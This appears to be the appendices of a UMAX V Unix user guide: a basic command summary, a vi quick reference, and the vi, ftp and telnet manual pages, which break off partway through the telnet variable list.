+awk '/str1/,/str2/' file display all lines between those + containing str1 and str2 + +awk '{print $n,$m}' file display fields n and m of file + +call host connect to a Multimax from an Annex + +cat file display file on the screen + +cat file1 >> file2 append file1 onto file2 + +cd return to your home directory + +cd dir work in directory dir + +chmod perms file change permissions on file to perms + +cp file1 file2 copy file1 to file2 + +cp f1 f2 f3 dir copy files f1, f2, and f3 into + directory dir + +csh the C shell + + +cu options host dial up a remote host + +cut -fx file display field x of file + +cut -da -fx file use a as a field separator + +diff file 1 file 2 display differences between file1 + and file2 + +echo string display string on the terminal + +file file1 describe file1's type (data, text, + binary, etc) + +finger user display information on user + +ftp interactive remote file transfer + +grep string file search for string in file + +grep -c string file display only the number of + occurrences of string + +grep -l string files list file names that contain string + +kill %x kill background job x + +ksh the KornShell + +lp -ddest file Print file on the printer dest + +ls list the files in the current + working directory + +ls dir list the files in directory dir + +ls -a include files that begin with a + . (period) + +ls -l long listing including permissions, + size and ownership + +ls -C list in columns + +ls -ld display detailed information on a + directory, not its contents + +mailx read mail via interactive mail + program + +mailx user send mail to user + + +man command display the man pages for command + +mkdir dir create directory dir + +mv file1 file2 move file1 to file2 + +mv f1 f2 f3 dir move files f1, f2, and f3 into + directory dir + +nsh host commands execute commands on a remote host + +passwd change your password + +pg file display file on screen at a time + +ps display process status of your + current session + +ps -u user display process for user + +pwd print (current) working directory + +rcp host1:file host2:file copy files from one host to another + +rlogin host login to a remote host + +rm file remove file + +rm -rdir remove directory dir and contents + +rmdir dir remove directory dir + +ruptime display status of hosts on the + network + +rwho display information on network + users + +sed -e "action" file use stream editor on file + +sh Bourne shell + +shl the Shell Layer Manager + +sort file perform an alphabetic sort based on + the first field of file + +sort -n file perform a numeric sort based on the + first field of file + +sort +x file sort on field x+1 + + +sort -ta file use a as a field separator + +spell file check file for correct spelling + +stty display current stty settings + +stty intr set interrupt character to + +stty kill set kill character to + +talk talk with user on your terminal + +talk file display the last 10 lines of file + +telenet host connect to a remote host + +telenet annex connect to an Annex for use of an + outbound port + +tr a b file in file, change every a to b + +vi file edit file with a full screen editor + +wc file list the number of lines, words and + characters in file + +write user send a message to user's terminal + +uucp file hostpath remote copy +APPENDIX I: vi COMMANDS QUICK REFERENCE + +Special Commands + +Esc return to command mode + u undo last command + . repeat last insert, delete or put command + +Saving Text and Quitting + +:w write (save) text +:w newfile save text to file newfile +:x,yw newfile save lines x to y into newfile +:q! quit without saving changes +:wq save text and quit + +Cursor Positioning + +N move to line N +N+ down N lines +N- up N lines +^D down one screen +^U up one screen +k up one line +j down one line +^ beginning of line +$ end of line +Nw N words ahead +Nb back N words +w word ahead +b back one word +e end of word +h backspace +l forward one space +arrow keys space left or right, go up or down one line + + +Searches + +/pattern search forward for pattern +?pattern search backward for pattern + ? or / repeat the last search + +Deleting Text + +Ndd delete N lines +dd delete current line +D delete remainder of line +Ndw delete N words +dw delete current word +Nx delete N characters +x delete one character + +Copying Text + +NY yank N lines +Y yank one line +Nyw yank N words +yw yank one word + +P put yanked lines above current cursor position, or + put yanked words before current cursor position + +p put yanked lines below current cursor position, or + put yanked words after current cursor position + +Entering Text Mode + +I enter text mode, additional text appears at the + beginning of the current line + +i enter text mode, additional text appears before + the current cursor position + +A enter text mode, additional text appears at the + end of the current line + +a enter text mode, additional text appears after the + current cursor position. + +O enter text mode, open a line above the current + line + +o enter text mode, open a line below the current + line + +Replacing and Substituting Text + +r replace one character at current cursor position, + then return to command mode + +R replace characters until Esc + +s substitute characters for the current character + until Esc + +Ns substitute characters for the current N characters + until Esc +Reading in Text + +:r filename append the contents of filename below the current + cursor position + +:r !shell-cmd append the output of shell-cmd below the current + cursor position + +Global Operations + +:x,ys/old/new/g + on lines x through y, change old to new + +:x,yg/pattern/d + delete any line from x toy that has the string + pattern + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +APPENDIX J: vi COMMANDS REFERENCE + + +NAME + vi - screen-oriented (visual) display editor based on ex + +SYNOPSIS + vi [ -t tag ] [ -r file ] [ -L ] [ -wn ] [ -R ] [ -x ] [ -C + ] [ -ccommand ] file ... + view [ -t tag ] [ -r file ] [ -L ] [ -wn ] [ -R ] [ -x ] [ + -C ] [ -ccommand ] file ... + vedit [ -t tag ] [ -r file ] [ -L ] [ -wn ] [ -R ] [ -x ] [ + -C ] [ -ccommand ] file ... + +DESCRIPTION + vi (visual) is a display-oriented text editor based on an + underlying line editor ex(1). It is possible to use the + command mode of ex from within vi and vice-versa. The visual + commands are described on this manual page; how to set + options (like automatically numbering lines and + automatically starting a new output line after a carriage + return) and all ex(1) line editor commands are described on + the ex(1) manual page. + + When using vi, changes made to the file are reflected in + what is displayed on the terminal screen. The position of + the cursor on the screen indicates the position within the + file. + +INVOCATION + The following invocation options are interpreted by vi: + + -t tag Edit the file containing the tag and position the + cursor at its definition. The file (tags) + containing the tag is found in the current directory + or in /usr/lib/tags. Below is an example of a tags + file: + + line /tmp/vi.file /line/ + this /tmp/vi.file /this/ + + Using "vi -t line", the edited file will be + "/tmp/vi.file". The file will be searched for the + first occurrence of "line", and the cursor will be + placed at "line". + + -r file Edit file after an editor or system crash. + (Recovers the version of file that was in the buffer + when the crash occurred.) + + -L List the name of all files saved as the result of an + editor or system crash. + + -wn Set the default window size to n. This is useful + when using the editor over a slow speed line. + + -R Readonly mode; the readonly flag is set, preventing + accidental overwriting of the file. + + -x Encryption option; when used, vi simulates the X + command of ex(1) and prompts the user for a key. + This key is used to encrypt and decrypt text using + the algorithm of crypt(1). The X command makes an + educated guess to determine whether or not text read + in is encrypted. The temporary buffer file is + encrypted also, using a transformed version of the + key typed in for the -x option. See crypt(1). + Also, see the WARNING section at the end of this + manual page. + + -C Encryption option, same as the -x option, except + that vi simulates the C command of ex(1). The C + command is like the X command of ex(1), except that + all text read in is assumed to have been encrypted. + + -c command Begin editing by executing the specified + editor command (usually a search or positioning + command). + + The file argument indicates one or more files to be edited. + + The view invocation is the same as vi except that the + readonly flag is set. + + The vedit invocation is intended for beginners. It is the + same as vi except that the report flag is set to 1, the + showmode and novice flags are set, and magic is turned off. + These defaults make it easier to learn vi. + +VI MODES + Command Normal and initial mode. Other modes return to + command mode upon completion. ESC (escape) is used + to cancel a partial command. + + Input Entered by setting the following options: a i A I o + O c s R. Arbitrary text may then be entered. + Input mode is normally terminated with ESC + character, or abnormally with interrupt. + + Last line + Reading input for : / ? or !; terminate with CR to + execute, interrupt to cancel. +COMMAND SUMMARY + In the descriptions, CR stands for carriage return and ESC + stands for the escape key. + + Sample Commands + + <- | | -> arrow keys move the cursor + h j k l same as arrow keys + itextESC insert text + cwnewESC change word to new + easESC pluralize word (end of word; append s; + escape from input state) + x delete a character + dw delete a word + dd delete a line + 3dd delete 3 lines + u undo previous change + ZZ exit vi, saving changes + :q!CR quit, discarding changes + /textCR search for text + U D scroll up or down + :ex cmdCR any ex or ed command + + Counts Before vi Commands + Numbers may be typed as a prefix to some commands. They are + interpreted in one of these ways: + + line/column number z G | + scroll amount D U + repeat effect most of the rest + + Interrupting, Canceling + ESC end insert or incomplete cmd + DEL (delete or rubout) interrupts + L reprint screen if DEL scrambles it + R reprint screen if L is -> key + + File Manipulation + ZZ if file is modified, write and exit; + otherwise, exit + :wCR write back changes + :w!CR forced write, if permission originally + not valid + :qCR quit + :q!CR quit, discard changes + :e nameCR edit file name + :e!CR reedit, discard changes + :e + nameCR edit, starting at end + :e +n filename CR edit starting at line n + :e #CR edit alternate file + :e! #CR edit alternate file, discard changes + :w nameCR write file name + + :w! nameCR overwrite file name + :shCR run shell, then return + :!cmdCR run cmd, then return + :nCR edit next file in arglist + :n argsCR specify new arglist + G show current file and line + :ta tagCR to tag file entry tag + + In general, any ex or ed command (such as substitute or + global) may be typed, preceded by a colon and followed by a + CR. + + Positioning Within File + F forward screen + B backward screen + D scroll down half screen + U scroll up half screen + Ng go to the beginning of the specified + line (end default), where n is a line + number + /pat next line matching pat + ?pat prev line matching pat + n repeat last / or ? command + N reverse last / or ? command + /pat/+n nth line after pat + ?pat?-n nth line before pat + ]] next section/function + [[ previous section/function + ( beginning of sentence + ) end of sentence + { beginning of paragraph + } end of paragraph + % find matching ( ) { or } + + Adjusting The Screen + L clear and redraw + zCR clear and redraw window if ^L is -> key + ZCR redraw screen with current line at top + of window + z-CR redraw screen with current line at + bottom of window + z.CR redraw screen with current line at + center of window + /pat/z-CR move pat line to bottom of window + zn.CR use n line window + E scroll window down 1 line + Y scroll window up 1 line + Marking and Returning + `` move cursor to previous context + '' move cursor to first non-white space in + line + mx mark current position with the ACSII + lower-case letter x + `x move cursor to mark x + 'x move cursor to first non-white space in + line marked by x + + Line Positioning + H top line on screen + L last line on screen + M middle line on screen + + next line, at first non-white + - previous line, at first non-white + CR return, same as + + | or j next line, same column + | or k previous line, same column + + Character Positioning + first non-white-space character + 0 beginning of line + $ end of line + l or -> forward + h or <- backwards + H same as <- (backspace) + space same as -> (space bar) + fx find next x + Fx find previous x + tx move to character prior to next x + Tx move to character following previous x + ; repeat last f F + , repeat last t T + n| to specified column + % find matching () { or } + + Words, Sentences, Paragraphs + w forward a word + b back a word + e end of word + ) to next sentence + } to next paragraph + ( back a sentence + { back a paragraph + W forward a blank-delimited word + B back a blank-delimited word + E to end of a blank-delimited word + Corrections During Insert + H erase last character (backspace) + W erase last word + erase erase, same as H + kill kill, erase this line of input + \ quotes H, erase and kill characters + ESC ends insertion, back to command mode + DEL interrupt, terminates insert mode + D backtab one character; reset left margin + of autoindent + |D caret () followed by control-d (D); + backtab to beginning of line; do not + reset left margin of autoindent + 0D backtab to beginning of line; reset left + margin of autoindent + V quote non-printable character + + Insert and Replace + a append after cursor + A append at end of line + i insert before cursor + I insert before first non-blank + o open line below + O open above + rx replace single char with x + RtextESC replace characters + + Operators + Operators are followed by a cursor motion, and affect all + text that would have been moved over. For example, since w + moves over a word, dw deletes the word. Double the + operator, e.g., dd to affect whole lines. + + d delete + c change + y yank lines to buffer + < left shift + > right shift + ! filter through command + + Miscellaneous Operations + C change rest of line (c$) + D delete rest of line (d$) + s substitute chars (cl) + S substitute lines (cc) + J join lines + x delete characters (dl) + X ... before cursor (dh) + Y yank lines (yy) + Yank and Put + Put inserts the text most recently deleted or yanked; + however, if a buffer is named (using the ASCII lower-case + letters a - z), the text in that buffer is put instead. + + 3yy yank 3 lines + 3yl yank 3 characters + p put back text after cursor + P put back text before cursor + "xp put from buffer x + "xY ("xyy) yank to buffer x + "xD ("xdd) delete into buffer x + + Undo, Redo, Retrieve + u undo last change + U restore current line + . repeat last change + "dp retrieve d'th last delete + +AUTHOR + vi and ex were developed by The University of California, + Berkeley California, Computer Science Division, Department + of Electrical Engineering and Computer Science. + +FILES + /tmp default directory where temporary + work files are placed; it can be + changed using the directory option + (see the ex(1) set command) + /usr/lib/terminfo/?/* compiled terminal description + database + /usr/lib/.COREterm/?/* subset of compiled terminal + description database, supplied on + hard disk + +NOTES + Two options, although they continue to be supported, have + been replaced in the documentation by options that follow + the Command Syntax Standard (see intro(1)). A -r option + that is not followed with an option-argument has been + replaced by -L and +command has been replaced by -c command. + +SEE ALSO + ed(1), ex(1). + "Screen Editor Tutorial (vi)" in the UMAX V User's Guide. + +WARNING + The encryption options are provided with the Security + Administration Utilities package, which is available only in + the United States. + Tampering with entries in /usr/lib/.COREterm/?/* or + /usr/lib/terminfo/?/* (for example, changing or removing an + entry) can affect programs such as vi(1) that expect the + entry to be present and correct. In particular, removing + the "dumb" terminal may cause unexpected problems. + +BUGS + Software tabs using T work only immediately after the + autoindent. + + Left and right shifts on intelligent terminals do not make + use of insert and delete character operations in the + terminal. +APPENDIX K: ftp COMMANDS REFERENCE + + +NAME + ftp - Internet file transfer program + +SYNOPSIS + ftp [ -v ] [ -d ] [ -i ] [ -n ] [ -g ] [ host ] + +DESCRIPTION + ftp is the user interface to the DARPA File Transfer + Protocol. The program transfers files to and from a remote + network site. + + The client host with which ftp is to communicate can be + specified on the command line. In this case, ftp immediately + attempts to establish a connection to an FTP server on that + host; otherwise, ftp enters its command interpreter and + waits for instruction, displaying the prompt ftp>. + + ftp recognizes the following commands: + + ! [ command [ args ] ] + Invoke an interactive shell on the local machine. + If there are arguments, the first is taken to be a + command to execute directly, with the rest of the + arguments as its arguments. + + $ macro-name [ args ] + Execute the macro-name that was defined with + the macdef command. Arguments are passed to the + macro unglobbed. + + account [ passwd ] + Supply a supplemental password required by a + remote system for access to resources once a login + has been successfully completed. If no argument + is included, the user will be prompted for an + account password in a non-echoing input mode. + + append local-file [ remote-file ] + Append a local file to a file on the remote + machine. If remote-file is left unspecified, the + local file name is used to name the remote file + after being altered by any ntrans or nmap setting. + File transfer uses the current settings for type, + format, mode, and structure. + + ascii Set the file transfer type to network ASCII. This + is the default type. + bell Sound a bell after each file transfer command is + completed. + + binary Set the file transfer type to support binary image + transfer. + + bye Terminate the FTP session with the remote server + and exit ftp. + + case Toggle remote computer file name case mapping + during mget commands. When case is on (default is + off), remote computer file names with all letters + in upper case are written in the local directory + with the letters mapped to lower case. + + cd remote-directory + Change the working directory on the remote machine + to remote-directory. + + cdup Change the remote machine working directory to the + parent of the current remote machine working + directory. + + close Terminate the FTP session with the remote server, + and return to the command interpreter. Any + defined macros are erased. + + cr Toggle carriage return stripping during ASCII type + file retrieval. Records are denoted by a carriage + return/linefeed sequence during ASCII type file + transfer. When cr is on (the default), carriage + returns are stripped from this sequence to conform + with the UNIX single linefeed record delimiter. + Records on non-UNIX remote systems may contain + single linefeeds; when an ASCII type transfer is + made, these linefeeds may be distinguished from a + record delimiter only when cr is off. + + delete remote-file + Delete the file remote-file on the remote machine. + + debug [ debug-value ] + Toggle debugging mode. If an optional debug-value + is specified, it is used to set the debugging + level. When debugging is on, ftp prints each + command sent to the remote machine, preceded by + the string --> . + dir [ remote-directory ] [ local-file ] + Print the contents of directory, remote-directory, + and, optionally, place the output in local-file. + If no directory is specified, the current working + directory on the remote machine is used. If no + local file is specified, or local-file is -, + output comes to the terminal. + + disconnect + A synonym for close. + + form format + Set the file transfer form to format. The default + format is file. + + get remote-file [ local-file ] + Retrieve the remote-file and store it on the local + machine. If the local file name is not specified, + it is given the same name it has on the remote + machine, subject to alteration by the current + case, ntrans, and nmap settings. The current + settings for type, form, mode, and structure are + used while transferring the file. + + glob Toggle filename expansion for mdelete, mget and + mput. If globbing is turned off with glob, the + file name arguments are taken literally and not + expanded. Globbing for mput is done as in csh(1). + For mdelete and mget, each remote file name is + expanded separately on the remote machine and the + lists are not merged. Expansion of a directory + name is likely to be different from expansion of + the name of an ordinary file: the exact result + depends on the foreign operating system and FTP + server, and can be previewed by doing + "mls remote-files -". Note: mget and mput are + not meant to transfer entire directory subtrees of + files. That can be done by transferring a tar(1) + archive of the subtree (in binary mode). + + hash Toggle number-sign (#) printing for each data + block transferred. The size of a data block is + 1024 bytes. + + help [ command ] + Print a description of command. With no argument, + ftp prints a list of the known commands. + + lcd [ directory ] + Change the working directory on the local machine. + If no directory is specified, changes to the + user's home directory. + + ls [ remote-directory ] [ local-file ] + Print an abbreviated listing of the contents of a + directory on the remote machine. If remote- + directory is left unspecified, the current working + directory is used. If no local file is specified, + the output is sent to the terminal. + + macdef macro-name + Define a macro. Subsequent lines are stored as + the macro macro-name; a null line (consecutive + newline characters in a file or carriage returns + from the terminal) terminates macro input mode. + There is a limit of 16 macros and 4096 total + characters in all defined macros. Macros remain + defined until a close command is executed. The + macro processor interprets "$" and "\" as special + characters. A "$" followed by a number (or + numbers) is replaced by the corresponding argument + on the macro invocation command line. A "$" + followed by an "i" signals that macro processor + that the executing macro is to be looped. On the + first pass "$i" is replaced by the first argument + on the macro invocation command line, on the + second pass it is replaced by the second argument, + and so on. A "\" followed by any character is + replaced by that character. Use the "\" to + prevent special treatment of the "$". + + mdelete [ remote-files ] + Delete the specified files on the remote machine. + + mdir remote-files local-file + Like dir, except multiple remote files may be + specified. If interactive prompting is on, ftp + will prompt the user to verify that the last + argument is indeed the target local file for + receiving mdir output. + + mget remote-files + Expand the remote-files on the remote machine and + do a get for each file name thus produced. See + glob for details on the filename expansion. + Resulting file names will then be processed + according to case, ntrans, and nmap settings. + Files are transferred into the local working + directory, which can be changed with + "lcd directory"; new local directories can be + created with "! mkdir directory". + + mkdir directory-name + Make a directory on the remote machine. + mls remote-files local-file + Like ls, except multiple remote files may be + specified. If interactive prompting is on, ftp + will prompt the user to verify that the last + argument is indeed the target local file for + receiving mls output. + + mode [ mode-name ] + Set the file transfer mode to mode-name. The + default mode is stream. + + mput local-files + Expand wild cards in the list of local files given + as arguments and do a put for each file in the + resulting list. See glob for details of filename + expansion. Resulting file names will then be + processed according to ntrans and nmap settings. + + nmap [ inpattern outpattern ] + Set or unset the filename mapping mechanism. If + no arguments are specified, the filename mapping + mechanism is unset. If arguments are specified, + remote filenames are mapped during mput commands + and put commands issued without a specified remote + target filename. If arguments are specified, + local filenames are mapped during mget commands + and get commands issued without a specified local + target filename. This command is useful when + connecting to a non-UNIX remote computer with + different file naming conventions or practices. + The mapping follows the pattern set by inpattern + and outpattern. inpattern is a template for + incoming filenames (which may have already been + processed according to the ntrans and case + settings). Variable templating is accomplished by + including the sequences "$1", "$2", ..., "$9" in + inpattern. Use "\" to prevent this special + treatment of the "$" character. All other + characters are treated literally, and are used to + determine the nmap inpattern variable values. For + example, given inpattern $1.$2 and the remote file + name mydata.data, $1 would have the value mydata, + and $2 would have the value data. The outpattern + determines the resulting mapped filename. The + sequences "$1", "$2", ..., "$9" are replaced by + any value resulting from the inpattern template. + The sequence "$0" is replaced by the original + filename. Additionally, the sequence + "[seq1,seq2]" is replaced by seq1 if seq1 is not a + null string; otherwise it is replaced by seq2. + For example, the command "nmap $1.$2.$3 + [$1,$2].[$2,file]" would yield the output filename + myfile.data for input filenames myfile.data and + myfile.data.old, myfile.file for the input + filename myfile, and myfile.myfile for the input + filename .myfile. Spaces may be included in + outpattern, as in the example: + + nmap $1 | sed "s/ *$//" > $1 + + Use the "\" character to prevent special treatment + of the "$", "[", "]", and "," characters. + + ntrans [ inchars [ outchars ] ] + Set or unset the filename character translation + mechanism. If no arguments are specified, the + filename character translation mechanism is unset. + If arguments are specified, characters in remote + filenames are translated during mput commands and + put commands issued without a specified remote + target filename. If arguments are specified, + characters in local filenames are translated + during mget commands and get commands issued + without a specified local target filename. This + command is useful when connecting to a non-UNIX + remote computer with different file naming + conventions or practices. Characters in a + filename matching a character in inchars are + replaced with the corresponding character in + outchars. If the character's position in inchars + is longer than the length of outchars, the + character is deleted from the file name. + + open host [ port ] + Establish a connection to the specified host's FTP + server. An optional port number can be supplied, + in which case, ftp attempts to contact an FTP + server at that port. If the auto-login option is + on (default), ftp also attempts to automatically + log the user in to the FTP server (see below). + + prompt Toggle interactive prompting. Interactive + prompting occurs during multiple file transfers to + allow the user to selectively retrieve or store + files. If prompting is turned off (default), any + mget or mput transfers all files and mdelete will + delete all files. + proxy ftp-command + Execute an ftp command on a secondary control + connection. This command allows simultaneous + connection to two remote FTP servers for + transferring files between the two servers. The + first proxy command should be an open, to + establish the secondary control connection. Enter + the command "proxy ?" to see other ftp commands + executable on the secondary connection. The + following commands behave differently when + prefaced by proxy: open will not define new + macros during the auto-login process, close will + not erase existing macro definitions, get and mget + transfer files from the host on the primary + control connection to the host on the secondary + control connection, and put, mput, and append + transfer files from the host on the secondary + control connection to the host on the primary + control connection. Third party file transfers + depend upon support of the FTP protocol PASV + command by the server on the secondary control + connection. + + put local-file [ remote-file ] + Store a local file on the remote machine. If + remote-file is left unspecified, the local file + name is used in naming the remote file, after + processing according to any ntrans or nmap + settings. File transfer uses the current settings + for type, format, mode, and structure. + + pwd Print the name of the current working directory on + the remote machine. + + quit A synonym for bye. + + quote arg1 arg2 ... + The arguments specified are sent, verbatim, to the + remote FTP server. + + recv remote-file [ local-file ] + A synonym for get. + + remotehelp [ command-name ] + Request help from the remote FTP server. If a + command-name is specified, it is supplied to the + server as well. + + rename [ from ] [ to ] + Rename, on the remote machine, the file from to + the file to. + reset Clear reply queue. This command re-synchronizes + command/reply sequencing with the remote FTP + server. Resynchronization may be necessary + following a violation of the FTP protocol by the + remote server. + + rmdir directory-name + Delete a directory on the remote machine. + + runique Toggle storing of files on the local system with + unique filenames. If a file already exists with a + name equal to the target local filename for a get + or mget command, a ".1" is appended to the name. + If the resulting name matches another existing + file, a ".2" is appended to the original name. If + this process continues up to ".99", an error + message is printed, and the transfer does not take + place. The generated unique filename will be + reported. Note that runique will not affect local + files generated from a shell command (see below). + The default value is off. + + send local-file [ remote-file ] + A synonym for put. + + sendport Toggle the use of PORT commands. By default, ftp + attempts to use a PORT command when establishing a + connection for each data transfer. The use of PORT + commands can prevent delays when performing + multiple file transfers. If the PORT command + fails, ftp uses the default data port. When the + use of PORT commands is disabled, no attempt is + made to use them for each data transfer. This is + useful for certain FTP implementations that do + ignore PORT commands but wrongly indicate they + have been accepted. + + status Show the current status of ftp. + + struct [ struct-name ] + Set the file transfer structure to struct-name. + The default structure is stream. + + sunique Toggle storing of files on remote machine under + unique file names. Remote FTP server must support + the FTP protocol STOU command for successful + completion. The remote server will report a + unique name. Default value is off. + + tenex Set the file transfer type to that needed to talk + to TENEX machines. + trace Toggle packet tracing. + + type [ type-name ] + Set the file transfer type to type-name. If no + type-name is specified, the current type is + printed. The default type is network ascii. + + user user-name [ password ] [ account ] + The user identifies him/herself to the remote FTP + server. If the password is not specified and the + server requires it, ftp prompts the user for it + (after disabling local echo). If an account field + is not specified, and the FTP server requires it, + the user is prompted for it. If an account field + is specified, an account command will be relayed + to the remote server after the login sequence is + completed if the remote server did not require it + for logging in. Unless ftp is invoked with + "auto-login" disabled, this process is done + automatically on initial connection to the FTP + server. + + verbose Toggle verbose mode. In verbose mode, all + responses from the FTP server are displayed to the + user. In addition, if verbose is on, when a file + transfer completes, statistics regarding the + efficiency of the transfer are reported. By + default, verbose is on. + + ? [ command ] + A synonym for help. + + Command arguments that have embedded spaces can be quoted + with double quote (") marks. + +ABORTING A FILE TRANSFER + To abort a file transfer, use the terminal interrupt key + (usually C). Sending transfers will be immediately + halted. Receiving transfers will be halted by sending a FTP + protocol ABOR command to the remote server, and discarding + any further data received. The speed at which this is + accomplished depends upon the remote server's support for + ABOR processing. If the remote server does not support the + ABOR command, an ftp> prompt will not appear until the + remote server has completed sending the requested file. + + The terminal interrupt key sequence will be ignored when ftp + has completed any local processing and is awaiting a reply + from the remote server. A long delay in this mode may + result from the ABOR processing described above, or from + unexpected behavior by the remote server, including + violations of the FTP protocol. If the delay results from + unexpected remote server behavior, the local ftp program + must be killed by hand. + +FILE NAMING CONVENTIONS + Files specified as arguments to ftp commands are processed + according to the following rules. + + 1. If the file name is -, the standard input (for reading) + or the standard output (for writing) is used. + + 2. If the first character of the file name is a bar |, the + remainder of the argument is interpreted as a shell + command. ftp then forks a shell, using popen(3S) with + the argument supplied, and reads (writes) from the + stdout (stdin). If the shell command includes spaces, + the argument must be quoted; for example, "| ls -lt". A + particularly useful example of this mechanism is + "dir | more". + + 3. Failing the above checks, if globbing is enabled, local + file names are expanded according to the rules used in + the csh(1); see the glob command. If the ftp command + expects a single local file (e.g., put), only the first + filename generated by the globbing operation is used. + + 4. For mget commands and get commands with unspecified + local file names, the local filename is the remote + filename, which may be altered by a case, ntrans, or + nmap setting. The resulting filename may then be + altered if runique is on. + + 5. For mput commands and put commands with unspecified + remote file names, the remote filename is the local + filename, which may be altered by a ntrans or nmap + setting. The resulting filename may then be altered by + the remote server if sunique is on. + +FILE TRANSFER PARAMETERS + The FTP specification identifies many parameters that can + affect a file transfer. The type can be one of ascii, image + (binary), ebcdic, and local byte size (for PDP-10's and + PDP-20's mostly). ftp supports the ascii and image types of + file transfer, plus local byte size 8 for tenex mode + transfers. + + ftp supports only the default values for the remaining file + transfer parameters: mode, form, and struct. + +OPTIONS + Options can be specified at the command line, or to the + command interpreter. + + The -v (verbose on) option forces ftp to show all responses + from the remote server, as well as report on data transfer + statistics. + + The -n option restrains ftp from attempting "auto-login" + upon initial connection. If auto-login is enabled, ftp + checks the netrc file in the user's home directory for an + entry describing an account on the remote machine. If no + entry exists, ftp will prompt for the remote machine login + name (default is the user identity on the local machine), + and, if necessary, prompt for a password and an account with + which to login. + + The -i option turns off interactive prompting during + multiple file transfers. + + The -d option enables debugging. + + The -g option disables file name globbing. + +THE .netrc FILE + The .netrc file contains login and initialization + information used by the "auto-login" process. It resides in + the user's home directory. The following tokens are + recognized; they may be separated by spaces, tabs, or new- + lines: + + machine name + Identify a remote machine name. The auto-login process + searches the .netrc file for a machine token that + matches the remote machine specified on the ftp command + line or as an open command argument. Once a match is + made, the subsequent .netrc tokens are processed, + stopping when the end of file is reached or another + machine token is encountered. + + login name + Identify a user on the remote machine. If this token + is present, the "auto-login" process will initiate a + login using the specified name. + + password string + Supply a password. If this token is present, the + "auto-login" process will supply the specified string + if the remote server requires a password as part of the + login process. Note that if this token is present in + the .netrc file, ftp will abort the "auto-login" + process if the .netrc is readable by anyone besides the + user. + account string + Supply an additional account password. If this token + is present, the "auto-login" process will supply the + specified string if the remote server requires an + additional account password, or the "auto-login" + process will initiate an ACCT command if it does not. + + macdef name + Define a macro. This token functions like the ftp + macdef command functions. A macro is defined with the + specified name; its contents begin with the next .netrc + line and continue until a null line (consecutive new- + line characters) is encountered. If a macro named init + is defined, it is automatically executed as the last + step in the "auto-login" process. + +SEE ALSO + csh(1). + ftpd(1M) in the UMAX V Administrator's Reference Manual. + +BUGS + Correct execution of many commands depends upon proper + behavior by the remote server. + + An error in the treatment of carriage returns in the 4.2BSD + UNIX ASCII-mode transfer code has been corrected. This + correction may result in incorrect transfers of binary files + to and from 4.2BSD servers using the ascii type. Avoid this + problem by using the binary image type. +APPENDIX L: telnet COMMANDS REFERENCE + + +NAME + telnet - user interface to the TELNET protocol + +SYNOPSIS + telnet [ host [ port ] ] + +DESCRIPTION + The telnet command communicates with another host using the + TELNET protocol. If telnet is invoked without arguments, it + enters command mode, indicated by its prompt (for example, + telnet>). In this mode, it accepts and executes the + commands listed below. If it is invoked with arguments, it + performs an open command (see below) with those arguments. + Once a connection has been opened, telnet enters input mode. + The input mode entered will be either character at a time or + line by line depending on what the remote system supports. + + In character at a time mode, most text typed is immediately + sent to the remote host for processing. + In line by line mode, all text is echoed locally, and + (normally) only completed lines are sent to the remote host. + The local echo character (initially ^E) may be used to turn + off and on the local echo (this would mostly be used to + enter passwords without the password being echoed). + + In either mode, if the localchars toggle is TRUE (the + default in line mode; see below), the user's quit, intr, and + flush characters are trapped locally, and sent as TELNET + protocol sequences to the remote side. There are options + (see toggle autoflush and toggle autosynch below) which + cause this action to flush subsequent output to the terminal + (until the remote host acknowledges the TELNET sequence) and + flush previous terminal input (in the case of quit and + intr). + + While connected to a remote host, telnet command mode may be + entered by typing the telnet escape character (initially + ^]). When in command mode, the normal terminal editing + conventions are available. + +COMMANDS + The following commands are available. Only enough of each + command to uniquely identify it need be typed (this is also + true for arguments to the mode, set, toggle, and display + commands). + open host [ port ] + Open a connection to the named host. If no port + number is specified, telnet attempts to contact a + TELNET server at the default port. The host + specification can be either a host name (see + hosts(4)) or an Internet address specified in "dot + notation" (see inet(3N)). + + close Close a TELNET session and return to command mode. + + quit Close any open TELNET session and exit telnet. An + end-of-file (in command mode) will also close a + session and exit. + + Z Suspend telnet. This command only works when the + user is using the csh(1) or the BSD application + environment version of ksh(1). + + status Show the current status of telnet. This includes + the peer one is connected to, as well as the + current mode. + + display [ argument ... ] + Displays all, or some, of the set and toggle values + (see below). + + ? [ command ] + Get help. With no arguments, telnet prints a help + summary. If a command is specified, telnet will + print the help information for just that command. + + send arguments + Sends one or more special character sequences to + the remote host. The following are the arguments + which may be specified (more than one argument may + be specified at a time): + + escape + Sends the current telnet escape character + (initially ^]). + + synch + Sends the TELNET SYNCH sequence. This + sequence causes the remote system to discard + all previously typed (but not yet read) input. + This sequence is sent as TCP urgent data (and + may not work if the remote system is a 4.2 BSD + system -- if it doesn't work, a lower case r + may be echoed on the terminal). + brk + Sends the TELNET BRK (Break) sequence, which + may have significance to the remote system. + + ip + Sends the TELNET IP (Interrupt Process) + sequence, which should cause the remote system + to abort the currently running process. + + ao + Sends the TELNET AO (Abort Output) sequence, + which should cause the remote system to flush + all output from the remote system to the + user's terminal. + + ayt + Sends the TELNET AYT (Are You There) sequence, + to which the remote system may or may not + choose to respond. + + ec + Sends the TELNET EC (Erase Character) + sequence, which should cause the remote system + to erase the last character entered. + + el + Sends the TELNET EL (Erase Line) sequence, + which should cause the remote system to erase + the line currently being entered. + + ga + Sends the TELNET GA (Go Ahead) sequence, which + likely has no significance to the remote + system. + + nop + Sends the TELNET NOP (No operation) sequence. + + ? + Prints out help information for the send + command. + + set argument value + Set any one of a number of telnet variables to a + specific value. The special value off turns off + the function associated with the variable. The + values of variables may be interrogated with the + display command. The variables which may be + specified are: + echo + This is the value (initially ^E) which, when + in line by line mode, toggles between doing + local echoing of entered characters (for + normal processing), and suppressing echoing of + entered characters (for entering, say, a + password). + escape + This is the telnet escape character (initially + ^[) which causes entry into telnet command + mode (when connected to a remote system). + + interrupt + If telnet is in localchars mode (see toggle + localchars below) and the interrupt character + is typed, a TELNET IP sequence (see send ip + above) is sent to the remote host. The + initial value for the interrupt character is + taken to be the terminal's intr character. + + quit + If telnet is in localchars mode (see toggle + localchars below) and the quit character is + typed, a TELNET BRK sequence (see send brk + above) is sent to the remote host. The + initial value for the quit character is taken + to be the terminal's quit character. + + flushoutput + If telnet is in localchars mode (see toggle + localchars below) and the flushoutput + 